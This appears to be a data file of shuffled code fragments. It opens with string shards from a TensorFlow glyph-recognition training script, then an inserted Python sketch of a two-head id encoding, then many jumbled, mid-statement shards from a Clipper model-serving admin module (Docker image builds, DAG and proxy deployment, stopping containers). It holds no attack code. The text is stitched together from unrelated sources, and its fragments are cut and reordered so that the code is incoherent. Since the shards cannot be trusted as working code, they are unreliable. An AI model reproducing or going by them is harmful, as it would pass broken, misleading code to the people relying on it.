txt.write('predict: id %d nothing (p=%f)\\n'%(predid,", "[] labels = [] with open(os.path.join(self.result_dir,'test_result-%d.txt'%epoch),'w') as txt: correct_count =", "'target_id': target_id, 'target_id1': target_id1, 'target_id2': target_id2, } def make_plot(self, test_ds,", "{ 'image': inputs['input'], } feature = self.encoder(input_data) outputs = self.decoder(feature)", "1e5, 0.5) self.optimizer = tf.keras.optimizers.Adam(lr) self.encoder = net.FeatureBlock() self.encoder.summary() self.decoder" ]
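# Worth noting in make_plot above: the network predicts a glyph id with two
# softmax heads, and the scalar id is recombined as predid1 * 100 + predid2,
# with the joint confidence taken as the product of the two head probabilities.
# Below is a minimal self-contained sketch of that encoding and its inverse;
# the head sizes here are illustrative assumptions, not taken from net.

import numpy as np

def compose_id(p_id1, p_id2):
    """Combine two softmax heads into one glyph id plus a joint probability."""
    i1 = int(np.argmax(p_id1))
    i2 = int(np.argmax(p_id2))
    return i1 * 100 + i2, float(p_id1[i1] * p_id2[i2])

# Toy distributions: head 1 picks class 3, head 2 picks class 7 -> id 307.
p1 = np.full(10, 0.01);   p1[3] = 0.91    # sums to 1.0
p2 = np.full(100, 0.001); p2[7] = 0.901   # sums to 1.0
predid, p = compose_id(p1, p2)
assert predid == 307
assert (predid // 100, predid % 100) == (3, 7)  # inverse of the encoding
print('id=%d p=%.3f' % (predid, p))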
[ "This is a convenience method to avoid the need to", "pp.pformat(model_dict))) def stop_all_model_containers(self): \"\"\"Stops all model containers started via Clipper", "Test; Not Windows Compatible logging.basicConfig( format='%(asctime)s %(levelname)-8s %(message)s', datefmt='%y-%m-%d:%H:%M:%S', level=logging.INFO)", "to model') runtime_dag_id = name+version+str(1) ## Starting frontend frontend_name, frontend_container_id", "if not self.connected: raise UnconnectedException() # model_info = self.get_all_models() dag_description_", "models if you specify them. You almost certainly want to", "commands. This includes the query and management frontend Docker containers", "take not effect in Kubernetes. \"\"\" self.cm.stop_all(graceful=graceful) self.logger.info( \"Stopped all", "via Clipper admin commands. This includes the query and management", "if not self.connected: raise UnconnectedException() def build_and_deploy_model(self, name, version, input_type,", "Finished setting DAG for proxy {proxy_name} '.format(proxy_name=proxy_name)) #tells the backups", "container_name, container_id, host)) container_ip = self.cm.get_container_ip(host, container_id) proxy_name, proxy_id =", "tarfile import sys from cloudpickle import CloudPickler import pickle import", "with the model/proxy instances info expanded_dag = graph_parser.expand_dag(dag_description_, name, version,", "MessageToDict if sys.version_info < (3, 0): try: from cStringIO import", "model_dict[m[\"model_name\"]].append(m[\"model_version\"]) # else: # model_dict[m[\"model_name\"]] = [m[\"model_version\"]] # self.cm.stop_models(model_dict) #", "a model name must be a valid DNS-1123 \" \"", "self.get_all_models(verbose=True) # model_dict = {} # for m in model_info:", "version, input_type, image, labels=None, num_replicas=1, batch_size=-1): if not self.connected: raise", "model names. All replicas of all versions of each model", "version, 'old' , self.cm.admin_ip, self.cm.admin_port, expanded_dag)) self.logger.info(\"Added new runtime DAG", "Clipper: {}\".format(e.msg)) raise e def connect(self): \"\"\"Connect to a running", "with container %s:%s (HOST:%s)\"%(model_name, container_name, container_id, host)) container_ip = self.cm.get_container_ip(host,", "pprint.PrettyPrinter(indent=4) # self.logger.info( # \"Stopped all containers for these models", "and must start and end with \" \"an alphanumeric character", "df_tarinfo.size = df_contents.tell() df_contents.seek(0) context_tar.addfile(df_tarinfo, df_contents) except TypeError: df_contents =", "frontend', query_frontend_url), # ('management frontend', mgmt_frontend_url)]: # r = requests.get(url,", "of model \"music_recommender\" and version 3 is the current version::", "Redis has crashed. It can also be called without calling", "def stop_models(self, model_names): \"\"\"Stops all versions of the specified models.", "use one of the other stop_* methods. Use with caution.", "The address as an IP address or hostname. 
Raises ------", "replicas for each version of each model will be stopped.", "self.cm.set_proxy(\"mxschen/ai-proxy:latest\", backup_name, backup_ip, backup_host) backup_proxy_ip= self.cm.get_container_ip(backup_host, backup_proxy_id) backup_info.append([backup_name, backup_id, backup_ip,", "containers even if the Clipper management frontend or Redis has", "__future__ import absolute_import, division, print_function import logging import docker import", "\"--setdag %s %s %s\"%(tup[-1], \"22223\", expanded_dag)) self.logger.info('[DEPLOYMENT][Backup] Finished setting DAG", "# if m[\"model_name\"] in model_names and not m[\"is_current_version\"]: # if", "image def deploy_model(self, name, version, input_type, image, labels=None, num_replicas=1, batch_size=-1):", ".rpc import model_pb2_grpc from .rpc import model_pb2 from .rpc import", "but will leave containers serving version 3 untouched. Parameters ----------", "= docker.from_env() self.logger.info( \"Building model Docker image with model data", "#tells the backups runtime dag info for tup in backup_info:", "models whose old containers you want to stop. Raises ------", "'old' , self.cm.admin_ip, self.cm.admin_port, expanded_dag)) self.logger.info(\"Added new runtime DAG to", "self.logger.info('[DEPLOYMENT] Finished setting proxy info to model') # if(graph_parser.is_stateful(model_info)): #", "admin commands. This method can be used to clean up", "self.logger.info(\"Added new runtime DAG to admin daemon\\n%s\"%(expanded_dag)) #tells the proxy", "version = str(version) _validate_versioned_model_name(name, version) run_cmd = '' if pkgs_to_install:", "#self.cm.check_container_status(host, container_id, 0.3, 20) #self.cm.check_container_status(host, proxy_id, 0.3, 20) #time.sleep(25) #self.logger.info(\"proxy_ip:%s\"%(proxy_ip))", "proxy_ip = self.cm.get_container_ip(host, proxy_id) proxy_info.append([proxy_name,proxy_id,proxy_ip]) container_info.append([container_name, container_id, container_ip]) if graph_parser.is_stateful(model_info):", "be called without calling ``connect`` first. If graceful=False, Clipper will", "will stop the currently deployed versions of models if you", "requests.get(url, timeout=5) # if r.status_code != requests.codes.ok: # raise RequestException(", "= '' if pkgs_to_install: run_as_lst = 'RUN apt-get -y install", "import RequestException import json import pprint import time import re", "self.cm.connect_host(host_ip, \"2375\") def add_model(self, model_name, model_version, image, input_type=\"string\", output_type=\"string\", stateful=False):", "other stop_* methods. Use with caution. \"\"\" # if not", "stateful=stateful).SerializeToString() self.cm.grpc_client(\"zsxhku/grpcclient\", \"--addmodel %s %s %s \"%(\"localhost\",\"33333\", modelinfo)) return def", "whose old containers you want to stop. Raises ------ :py:exc:`clipper.UnconnectedException`", "3 of model \"music_recommender\" and version 3 is the current", "This method can be used to clean up leftover Clipper", "' ') run_cmd = ' '.join(run_as_lst + pkgs_to_install) with tempfile.NamedTemporaryFile(", "want to use one of the other stop_* methods. Use", "image to {}\".format(image)) for line in docker_client.images.push(repository=image, stream=True): self.logger.debug(line) return", "you want to stop. 
Raises ------ :py:exc:`clipper.UnconnectedException` \"\"\" # if", "reg=deploy_regex_str)) class ClipperConnection(object): def __init__(self, container_manager): self.connected = False self.cm", "frontend_ip = self.cm.get_container_ip(\"localhost\", frontend_container_id) frontend_info = [frontend_name, frontend_container_id, frontend_ip] self.logger.info(\"[DEPLOYMENT]", "stop_models(self, model_names): \"\"\"Stops all versions of the specified models. This", "of each model will be stopped. \"\"\" # if not", "for reading context_file.seek(0) image = \"{cluster}-{name}:{version}\".format( cluster=self.cm.cluster_identifier, name=name, version=version) if", "df_contents.tell() df_contents.seek(0) context_tar.addfile(df_tarinfo, df_contents) # Exit Tarfile context manager to", "input_type=\"string\", output_type=\"string\", stateful=False): modelinfo = management_pb2.ModelInfo(modelname=model_name, modelversion=model_version, image=image, inputtype=input_type, outputtype=output_type,", "to Clipper cluster at {}\".format( self.cm.get_query_addr())) def build_and_deploy_DAG(self, name, version,", "backup_proxy_name, backup_proxy_id, backup_proxy_ip]) else: backup_info.append([]) #self.cm.check_container_status(host, container_id, 0.3, 20) #self.cm.check_container_status(host,", "TODO: need to modularize self.cm.grpc_client(\"zsxhku/grpcclient\", \"--addruntimedag %s %s %s %s", "context tarfile with tarfile.TarFile( fileobj=context_file, mode=\"w\") as context_tar: context_tar.add(model_data_path) #", "str The JSON string containing the current set of metrics", "be called without calling ``connect`` first. \"\"\" self.cm.stop_all_model_containers() self.logger.info(\"Stopped all", "image=image, inputtype=input_type, outputtype=output_type, stateful=stateful).SerializeToString() self.cm.grpc_client(\"zsxhku/grpcclient\", \"--addmodel %s %s %s \"%(\"localhost\",\"33333\",", "proxy info to model') # if(graph_parser.is_stateful(model_info)): # self.cm.grpc_client(\"zsxhku/grpcclient\", \"--setproxy %s", "#################\") #expand the dag description with the model/proxy instances info", "# for m in model_info: # if m[\"model_name\"] in model_names", "a list of model Raises ------ :py:exc:`clipper.UnconnectedException` versions. 
All replicas", "not self.connected: raise UnconnectedException() version = str(version) _validate_versioned_model_name(name, version) self.cm.deploy_model(", "container_id, host)) container_ip = self.cm.get_container_ip(host, container_id) proxy_name, proxy_id = self.cm.set_proxy(\"mxschen/ai-proxy:latest\",", "container_info, proxy_info, backup_info, frontend_info) self.runtime_dag = expanded_dag # TODO: need", ".rpc import prediction_pb2 from .rpc import management_pb2 from .rpc import", "3 is the current version:: clipper_conn.stop_inactive_model_versions([\"music_recommender\"]) will stop any containers", "model_names and not m[\"is_current_version\"]: # if m[\"model_name\"] in model_dict: #", "runtime DAG to admin daemon\\n%s\"%(expanded_dag)) #tells the proxy runtime dag", "as StringIO PY3 = True import grpc from .rpc import", "image, labels, num_replicas, batch_size) def build_model(self, name, version, model_data_path, base_image,", "tarfile.TarFile( fileobj=context_file, mode=\"w\") as context_tar: context_tar.add(model_data_path) # From https://stackoverflow.com/a/740854/814642 try:", "container_name=base_image, data_path=model_data_path, run_command=run_cmd)) df_tarinfo = tarfile.TarInfo('Dockerfile') df_contents.seek(0, os.SEEK_END) df_tarinfo.size =", "self.logger.debug(line) return image def deploy_model(self, name, version, input_type, image, labels=None,", "hostname. Raises ------ :py:exc:`clipper.UnconnectedException` versions. All replicas for each version", "ClipperConnection(object): def __init__(self, container_manager): self.connected = False self.cm = container_manager", "at which the query frontend can be reached request predictions.", "def get_query_addr(self): \"\"\"Get the IP address at which the query", "all processes that were started via Clipper admin commands. This", "\" \"validation is '{reg}'\".format( version=version, reg=deploy_regex_str)) class ClipperConnection(object): def __init__(self,", "backup_proxy_ip]) else: backup_info.append([]) #self.cm.check_container_status(host, container_id, 0.3, 20) #self.cm.check_container_status(host, proxy_id, 0.3,", "container_id, host = self.cm.add_replica(model_name, model_version, \"22222\", model_image, runtime=runtime) self.logger.info(\"Started %s", "serving version 3 untouched. Parameters ---------- model_names : list(str) The", "not self.connected: # raise UnconnectedException() # model_info = self.get_all_models(verbose=True) #", "True except ClipperException as e: self.logger.warning(\"Error starting Clipper: {}\".format(e.msg)) raise", "model_pb2_grpc from .rpc import model_pb2 from .rpc import prediction_pb2_grpc from", "output_type=\"string\", stateful=False): modelinfo = management_pb2.ModelInfo(modelname=model_name, modelversion=model_version, image=image, inputtype=input_type, outputtype=output_type, stateful=stateful).SerializeToString()", "in proxy_info: proxy_name = tup[0] proxy_id = tup[1] proxy_ip =", "os import tarfile import sys from cloudpickle import CloudPickler import", "self.connected = True except ClipperException as e: self.logger.warning(\"Error starting Clipper:", "as an IP address or hostname. Raises ------ :py:exc:`clipper.UnconnectedException` versions.", "Raises ------ :py:exc:`clipper.UnconnectedException` \"\"\" # if not self.connected: # raise", "stopped. 
Note ---- This method will stop the currently deployed", "container %s:%s (HOST:%s)\"%(model_name, container_name, container_id, host)) container_ip = self.cm.get_container_ip(host, container_id)", "= \"http://{host}/metrics\".format( # host=self.cm.get_query_addr()) # mgmt_frontend_url = \"http://{host}/admin/ping\".format( # host=self.cm.get_admin_addr())", "in docker_client.images.push(repository=image, stream=True): self.logger.debug(line) return image def deploy_model(self, name, version,", "from .rpc import model_pb2 from .rpc import prediction_pb2_grpc from .rpc", "used for \" \"validation is '{reg}'\".format( version=version, reg=deploy_regex_str)) class ClipperConnection(object):", "image, labels=None, num_replicas=1, batch_size=-1): if not self.connected: raise UnconnectedException() version", "the proxy runtime dag info for tup in proxy_info: proxy_name", "method will stop the currently deployed versions of models if", "models and versions:\\n{}\".format( # pp.pformat(model_versions_dict))) def stop_inactive_model_versions(self, model_names): \"\"\"Stops all", "stop_inactive_model_versions(self, model_names): \"\"\"Stops all model containers serving stale versions of", "def _validate_versioned_model_name(name, version): if deployment_regex.match(name) is None: raise ClipperException( \"Invalid", "is None: raise ClipperException( \"Invalid value: {name}: a model name", "model_version, image, input_type=\"string\", output_type=\"string\", stateful=False): modelinfo = management_pb2.ModelInfo(modelname=model_name, modelversion=model_version, image=image,", "self.connected: raise UnconnectedException() return self.cm.get_query_addr() def stop_models(self, model_names): \"\"\"Stops all", "that were started via Clipper admin commands. This includes the", "backup_host)) backup_ip = self.cm.get_container_ip(backup_host, backup_id) backup_proxy_name, backup_proxy_id = self.cm.set_proxy(\"mxschen/ai-proxy:latest\", backup_name,", "with tarfile.TarFile( fileobj=context_file, mode=\"w\") as context_tar: context_tar.add(model_data_path) # From https://stackoverflow.com/a/740854/814642", ".exceptions import ClipperException, UnconnectedException from .version import __version__, __registry__ from", "\"22223\")) # self.logger.info('[DEPLOYMENT][Backup] Finished setting proxy info to model') runtime_dag_id", "need to explicitly list all versions of a model when", "issue Docker Kill if it's in the Docker Mode. This", "query_frontend_url), # ('management frontend', mgmt_frontend_url)]: # r = requests.get(url, timeout=5)", "absolute_import, division, print_function import logging import docker import tempfile import", "custom_context=True, tag=image) for b in build_logs: if 'stream' in b", "set of metrics for this instance. 
On error, the string", "pp = pprint.PrettyPrinter(indent=4) # self.logger.info( # \"Stopped all containers for", "= \"http://{host}/admin/ping\".format( # host=self.cm.get_admin_addr()) # for name, url in [('query", "UnconnectedException() # self.cm.stop_models(model_versions_dict) # pp = pprint.PrettyPrinter(indent=4) # self.logger.info( #", "of each model specified in the list will be stopped.", "backup_proxy_id) backup_info.append([backup_name, backup_id, backup_ip, backup_proxy_name, backup_proxy_id, backup_proxy_ip]) else: backup_info.append([]) #self.cm.check_container_status(host,", "to clean up leftover Clipper model containers even if the", "[] DEFAULT_PREDICTION_CACHE_SIZE_BYTES = 33554432 CLIPPER_TEMP_DIR = \"/tmp/clipper\" # Used Internally", "raise e def connect(self): \"\"\"Connect to a running Clipper cluster.\"\"\"", "of all versions of each model specified in the list", "all Clipper model containers\") def stop_all(self, graceful=True): \"\"\"Stops all processes", "for model_info in nodes_list: model_name,model_version,model_image = graph_parser.get_name_version(model_info) container_name, container_id, host", "stop_versioned_models(self, model_versions_dict): \"\"\"Stops the specified versions of the specified models.", "= self.cm.add_frontend(\"localhost\", \"mxschen/frontend\",runtime_dag_id, proxy_info[0][2], \"22223\", max_workers=2048) frontend_ip = self.cm.get_container_ip(\"localhost\", frontend_container_id)", "def stop_all(self, graceful=True): \"\"\"Stops all processes that were started via", "graceful=True): \"\"\"Stops all processes that were started via Clipper admin", "stop_all_model_containers(self): \"\"\"Stops all model containers started via Clipper admin commands.", "#self.logger.info(\"dag_description: %s\"%(dag_description_)) #if(dag_description==None): # dag_description_=self.get_dag_description() nodes_list = graph_parser.get_all_nodes(dag_description_) container_info =", "untouched. Parameters ---------- model_names : list(str) The names of the", "have deployed versions 1, 2, and 3 of model \"music_recommender\"", "will be stopped. Raises ------ :py:exc:`clipper.UnconnectedException` versions. All replicas for", "&& pip install'.split( ' ') run_cmd = ' '.join(run_as_lst +", "these models and versions:\\n{}\".format( # pp.pformat(model_versions_dict))) def stop_inactive_model_versions(self, model_names): \"\"\"Stops", "containers serving versions 1 and 2 but will leave containers", "\"\"\" self.cm.stop_all_model_containers() self.logger.info(\"Stopped all Clipper model containers\") def stop_all(self, graceful=True):", "suffix=\"tar\") as context_file: # Create build context tarfile with tarfile.TarFile(", "raise UnconnectedException() image = self.build_model(name, version, model_data_path, base_image, container_registry, pkgs_to_install)", "dag_description_ = dag_description #self.logger.info(\"dag_description: %s\"%(dag_description_)) #if(dag_description==None): # dag_description_=self.get_dag_description() nodes_list =", "model_info in nodes_list: model_name,model_version,model_image = graph_parser.get_name_version(model_info) container_name, container_id, host =", "StringIO( \"FROM {container_name}\\n{run_command}\\nCOPY {data_path} /model/\\n\". 
format( container_name=base_image, data_path=model_data_path, run_command=run_cmd)) df_tarinfo", "%s %s %s\"%(tup[-1], \"22223\", expanded_dag)) self.logger.info('[DEPLOYMENT][Backup] Finished setting DAG for", "df_contents) # Exit Tarfile context manager to finish the tar", "\"22222\", model_image) self.logger.info(\"[Backup] Started %s with container %s:%s (HOST:%s)\"%(model_name, backup_name,", "import CloudPickler import pickle import numpy as np from google.protobuf.json_format", "base_image, labels=None, container_registry=None, num_replicas=1, batch_size=-1, pkgs_to_install=None): if not self.connected: raise", "run_cmd = ' '.join(run_as_lst + pkgs_to_install) with tempfile.NamedTemporaryFile( mode=\"w+b\", suffix=\"tar\")", "build steps only self.logger.info(b['stream'].rstrip()) self.logger.info(\"Pushing model Docker image to {}\".format(image))", "fileobj=context_file, custom_context=True, tag=image) for b in build_logs: if 'stream' in", "tar file # Seek back to beginning of file for", "{proxy_name} '.format(proxy_name=tup[-1])) return def inspect_instance(self): \"\"\"Fetches performance metrics from the", "build_logs: if 'stream' in b and b['stream'] != '\\n': #log", "info to model') runtime_dag_id = name+version+str(1) ## Starting frontend frontend_name,", "versions of a model when calling :py:meth:`clipper_admin.ClipperConnection.stop_versioned_models`. Parameters ---------- model_names", "``connect`` first. If graceful=False, Clipper will issue Docker Kill if", "back to beginning of file for reading context_file.seek(0) image =", "def build_model(self, name, version, model_data_path, base_image, container_registry=None, pkgs_to_install=None): version =", "# host=self.cm.get_admin_addr()) # for name, url in [('query frontend', query_frontend_url),", "model_data_path)) image_result, build_logs = docker_client.images.build( fileobj=context_file, custom_context=True, tag=image) for b", "each model will be stopped. Note ---- This method will", "CONTAINERLESS_MODEL_IMAGE, ClusterAdapter from .exceptions import ClipperException, UnconnectedException from .version import", "or hostname. Raises ------ :py:exc:`clipper.UnconnectedException` versions. All replicas for each", "tempfile import requests from requests.exceptions import RequestException import json import", "in [('query frontend', query_frontend_url), # ('management frontend', mgmt_frontend_url)]: # r", "one of the other stop_* methods. Use with caution. 
\"\"\"", "self.logger.info( \"Successfully connected to Clipper cluster at {}\".format( self.cm.get_query_addr())) def", "= False ################################# self.logger = ClusterAdapter(logger, { 'cluster_name': self.cm.cluster_identifier })", "tup in proxy_info: proxy_name = tup[0] proxy_id = tup[1] proxy_ip", "StringIO PY3 = False else: from io import BytesIO as", "\"22222\", model_image, runtime=runtime) self.logger.info(\"Started %s with container %s:%s (HOST:%s)\"%(model_name, container_name,", "# model_dict[m[\"model_name\"]].append(m[\"model_version\"]) # else: # model_dict[m[\"model_name\"]] = [m[\"model_version\"]] # self.cm.stop_models(model_dict)", "= tarfile.TarInfo('Dockerfile') df_contents.seek(0, os.SEEK_END) df_tarinfo.size = df_contents.tell() df_contents.seek(0) context_tar.addfile(df_tarinfo, df_contents)", "%s %s %s %s\"%(proxy_ip, \"22223\", container_name, count, container_ip, \"22222\" ))", "name, version, container_info, proxy_info, backup_info, frontend_info) self.runtime_dag = expanded_dag #", "if container_registry is not None: image = \"{reg}/{image}\".format( reg=container_registry, image=image)", "= [] backup_info = [] count = 1 for model_info", "return def inspect_instance(self): \"\"\"Fetches performance metrics from the running Clipper", "pp.pformat(model_dict))) def stop_versioned_models(self, model_versions_dict): \"\"\"Stops the specified versions of the", "and versions:\\n{}\".format( # pp.pformat(model_dict))) def stop_versioned_models(self, model_versions_dict): \"\"\"Stops the specified", "try: df_contents = StringIO( str.encode( \"FROM {container_name}\\n{run_command}\\nCOPY {data_path} /model/\\n\". format(", "versions 1, 2, and 3 of model \"music_recommender\" and version", "a model when calling :py:meth:`clipper_admin.ClipperConnection.stop_versioned_models`. Parameters ---------- model_names : list(str)", "Kubernetes. \"\"\" self.cm.stop_all(graceful=graceful) self.logger.info( \"Stopped all Clipper cluster and all", "deploy_DAG(self, name, version, dag_description=None, runtime=\"\"): if not self.connected: raise UnconnectedException()", "{}\".format(image)) for line in docker_client.images.push(repository=image, stream=True): self.logger.debug(line) return image def", ".rpc import management_pb2 from .rpc import management_pb2_grpc from .container_manager import", "\"\"\"Stops all model containers serving stale versions of the specified", "character (e.g. 'example.com', regex used for \" \"validation is '{reg}'\".format(name=name,", "setting model info to proxy') if(graph_parser.is_stateful(model_info)): self.cm.grpc_client(\"zsxhku/grpcclient\", \"--setmodel %s %s", "not self.connected: # raise UnconnectedException() # self.cm.stop_models(model_versions_dict) # pp =", "# break # except RequestException as e: # self.logger.info(\"Clipper still", "version, input_type, image, labels, num_replicas, batch_size) def build_model(self, name, version,", "%s %s %s\"%(container_ip, \"22222\", proxy_name, \"22223\")) # self.logger.info('[DEPLOYMENT] Finished setting", "self.connected: raise UnconnectedException() def build_and_deploy_model(self, name, version, input_type, model_data_path, base_image,", "of the other stop_* methods. Use with caution. \"\"\" #", "will be stopped. \"\"\" if not self.connected: raise UnconnectedException() return", "with caution. 
\"\"\" # if not self.connected: # raise UnconnectedException()", "%s\"%(proxy_ip, \"22223\", expanded_dag)) self.logger.info('[DEPLOYMENT] Finished setting DAG for proxy {proxy_name}", "if the Clipper management frontend or Redis has crashed. It", "else: from io import BytesIO as StringIO PY3 = True", "steps only self.logger.info(b['stream'].rstrip()) self.logger.info(\"Pushing model Docker image to {}\".format(image)) for", "m[\"is_current_version\"]: # if m[\"model_name\"] in model_dict: # model_dict[m[\"model_name\"]].append(m[\"model_version\"]) # else:", "\"[a-z0-9]([-a-z0-9]*[a-z0-9])?\\Z\" deployment_regex = re.compile(deploy_regex_str) def _validate_versioned_model_name(name, version): if deployment_regex.match(name) is", "division, print_function import logging import docker import tempfile import requests", "each model will be stopped. \"\"\" # if not self.connected:", "%s\"%(backup_info[-1][-1], \"22223\", backup_info[-1][0], count, backup_info[-1][2], \"22222\" )) self.logger.info('[DEPLOYMENT][Backup] Finished setting", "= \"\" self.lock = False ################################# self.logger = ClusterAdapter(logger, {", "\"--setmodel %s %s %s %s %s %s\"%(proxy_ip, \"22223\", container_name, count,", "a model name and the value is a list of", "versions of each model specified in the list will be", "import model_pb2 from .rpc import prediction_pb2_grpc from .rpc import prediction_pb2", "model_image) self.logger.info(\"[Backup] Started %s with container %s:%s (HOST:%s)\"%(model_name, backup_name, backup_id,", "return def deploy_DAG(self, name, version, dag_description=None, runtime=\"\"): if not self.connected:", "= str(version) _validate_versioned_model_name(name, version) self.cm.deploy_model( name=name, version=version, input_type=input_type, image=image, num_replicas=num_replicas)", "Note ---- This method will stop the currently deployed versions", "self.cm.cluster_identifier }) def start_clipper(self, mgmt_frontend_image='{}/management_frontend:{}'.format( __registry__, __version__), cache_size=DEFAULT_PREDICTION_CACHE_SIZE_BYTES): try: self.cm.start_clipper(mgmt_frontend_image)", "= {} # for m in model_info: # if m[\"model_name\"]", "# model_info = self.get_all_models() dag_description_ = dag_description #self.logger.info(\"dag_description: %s\"%(dag_description_)) #if(dag_description==None):", "# self.register_model( # name, # version, # input_type, # image=image,", "versions of models if you specify them. You almost certainly", "alphanumeric character (e.g. 'example.com', regex used for \" \"validation is", "self.cm = container_manager #############TEST################ self.runtime_dag = \"\" self.lock = False", "This method will stop the currently deployed versions of models", "proxy_name, \"22223\")) # self.logger.info('[DEPLOYMENT] Finished setting proxy info to model')", "Internally for Test; Not Windows Compatible logging.basicConfig( format='%(asctime)s %(levelname)-8s %(message)s',", "the IP address at which the query frontend can be", "specify them. You almost certainly want to use one of", "= False else: from io import BytesIO as StringIO PY3", "all model containers started via Clipper admin commands. This method", "these models and versions:\\n{}\".format( # pp.pformat(model_dict))) def stop_versioned_models(self, model_versions_dict): \"\"\"Stops", "\"\"\"Stops all versions of the specified models. 
This is a", "= df_contents.tell() df_contents.seek(0) context_tar.addfile(df_tarinfo, df_contents) except TypeError: df_contents = StringIO(", "mgmt_frontend_image='{}/management_frontend:{}'.format( __registry__, __version__), cache_size=DEFAULT_PREDICTION_CACHE_SIZE_BYTES): try: self.cm.start_clipper(mgmt_frontend_image) # while True: #", "each entry in the dict, the key is a model", "from .rpc import management_pb2 from .rpc import management_pb2_grpc from .container_manager", "input_type, model_data_path, base_image, labels=None, container_registry=None, num_replicas=1, batch_size=-1, pkgs_to_install=None): if not", "all containers for these models and versions:\\n{}\".format( # pp.pformat(model_versions_dict))) def", "= re.compile(deploy_regex_str) def _validate_versioned_model_name(name, version): if deployment_regex.match(name) is None: raise", "container %s:%s (HOST:%s)\"%(model_name, backup_name, backup_id, backup_host)) backup_ip = self.cm.get_container_ip(backup_host, backup_id)", "DNS-1123 \" \" subdomain. It must consist of lower case", "from .rpc import prediction_pb2_grpc from .rpc import prediction_pb2 from .rpc", "' '.join(run_as_lst + pkgs_to_install) with tempfile.NamedTemporaryFile( mode=\"w+b\", suffix=\"tar\") as context_file:", "from {}\".format( model_data_path)) image_result, build_logs = docker_client.images.build( fileobj=context_file, custom_context=True, tag=image)", "proxy info to model') runtime_dag_id = name+version+str(1) ## Starting frontend", "frontend_container_id) frontend_info = [frontend_name, frontend_container_id, frontend_ip] self.logger.info(\"[DEPLOYMENT] ################ Started Frontend", "= True import grpc from .rpc import model_pb2_grpc from .rpc", "not affect Redis. It can also be called without calling", "url=url)) # break # except RequestException as e: # self.logger.info(\"Clipper", "image = \"{reg}/{image}\".format( reg=container_registry, image=image) docker_client = docker.from_env() self.logger.info( \"Building", "running Clipper cluster. Returns ------- str The JSON string containing", "in the Docker Mode. This parameter will take not effect", "list of model Raises ------ :py:exc:`clipper.UnconnectedException` versions. All replicas for", "management_pb2.ModelInfo(modelname=model_name, modelversion=model_version, image=image, inputtype=input_type, outputtype=output_type, stateful=stateful).SerializeToString() self.cm.grpc_client(\"zsxhku/grpcclient\", \"--addmodel %s %s", "used for \" \"validation is '{reg}'\".format(name=name, reg=deploy_regex_str)) if deployment_regex.match(version) is", "this will not affect Redis. It can also be called", "the dict, the key is a model name and the", "and all model containers. If you started Redis independently, this", "container_registry=None, pkgs_to_install=None): version = str(version) _validate_versioned_model_name(name, version) run_cmd = ''", "a convenience method to avoid the need to explicitly list", "key is a model name and the value is a", "stop_all(self, graceful=True): \"\"\"Stops all processes that were started via Clipper", "model version must be a valid DNS-1123 \" \" subdomain.", "performance metrics from the running Clipper cluster. Returns ------- str", "old containers you want to stop. 
Raises ------ :py:exc:`clipper.UnconnectedException` \"\"\"", "self.connected: raise UnconnectedException() # model_info = self.get_all_models() dag_description_ = dag_description", "and version 3 is the current version:: clipper_conn.stop_inactive_model_versions([\"music_recommender\"]) will stop", "20) #time.sleep(25) #self.logger.info(\"proxy_ip:%s\"%(proxy_ip)) self.cm.grpc_client(\"zsxhku/grpcclient\", \"--setmodel %s %s %s %s %s", "host=self.cm.get_admin_addr()) # for name, url in [('query frontend', query_frontend_url), #", "It can also be called without calling ``connect`` first. If", "< (3, 0): try: from cStringIO import StringIO except ImportError:", "Clipper cluster at {}\".format( self.cm.get_query_addr())) def build_and_deploy_DAG(self, name, version, dag_description,", "modularize self.cm.grpc_client(\"zsxhku/grpcclient\", \"--addruntimedag %s %s %s %s %s %s %s\"%('1',", "!= requests.codes.ok: # raise RequestException( # \"{name} end point {url}", "{}\".format(e)) # time.sleep(1) self.logger.info(\"Clipper is running\") self.connected = True except", "point {url} health check failed\".format(name=name, url=url)) # break # except", "import ClipperException, UnconnectedException from .version import __version__, __registry__ from .", "must be a valid DNS-1123 \" \" subdomain. It must", "if 'stream' in b and b['stream'] != '\\n': #log build", "\"Building model Docker image with model data from {}\".format( model_data_path))", "logger = logging.getLogger(__name__) deploy_regex_str = \"[a-z0-9]([-a-z0-9]*[a-z0-9])?\\Z\" deployment_regex = re.compile(deploy_regex_str) def", "backup_proxy_id, backup_proxy_ip]) else: backup_info.append([]) #self.cm.check_container_status(host, container_id, 0.3, 20) #self.cm.check_container_status(host, proxy_id,", "admin daemon\\n%s\"%(expanded_dag)) #tells the proxy runtime dag info for tup", "= True self.logger.info( \"Successfully connected to Clipper cluster at {}\".format(", "name=name, version=version)) def connect_host(self, host_ip, host_port): self.cm.connect_host(host_ip, \"2375\") def add_model(self,", "a running Clipper cluster.\"\"\" self.cm.connect() self.connected = True self.logger.info( \"Successfully", "expanded_dag)) self.logger.info(\"Added new runtime DAG to admin daemon\\n%s\"%(expanded_dag)) #tells the", "to model') # if(graph_parser.is_stateful(model_info)): # self.cm.grpc_client(\"zsxhku/grpcclient\", \"--setproxy %s %s %s", "%s %s \"%(\"localhost\",\"33333\", modelinfo)) return def deploy_DAG(self, name, version, dag_description=None,", "It must consist of lower case \" \"alphanumeric characters, '-'", "# self.cm.grpc_client(\"zsxhku/grpcclient\", \"--setproxy %s %s %s %s\"%(container_ip, \"22222\", proxy_name, \"22223\"))", "Raises ------ :py:exc:`clipper.UnconnectedException` versions. All replicas for each version of", "not m[\"is_current_version\"]: # if m[\"model_name\"] in model_dict: # model_dict[m[\"model_name\"]].append(m[\"model_version\"]) #", "re.compile(deploy_regex_str) def _validate_versioned_model_name(name, version): if deployment_regex.match(name) is None: raise ClipperException(", "Used Internally for Test; Not Windows Compatible logging.basicConfig( format='%(asctime)s %(levelname)-8s", "self.logger.info(\"Clipper still initializing: \\n {}\".format(e)) # time.sleep(1) self.logger.info(\"Clipper is running\")", "import tarfile import sys from cloudpickle import CloudPickler import pickle", "serving stale versions of the specified models. 
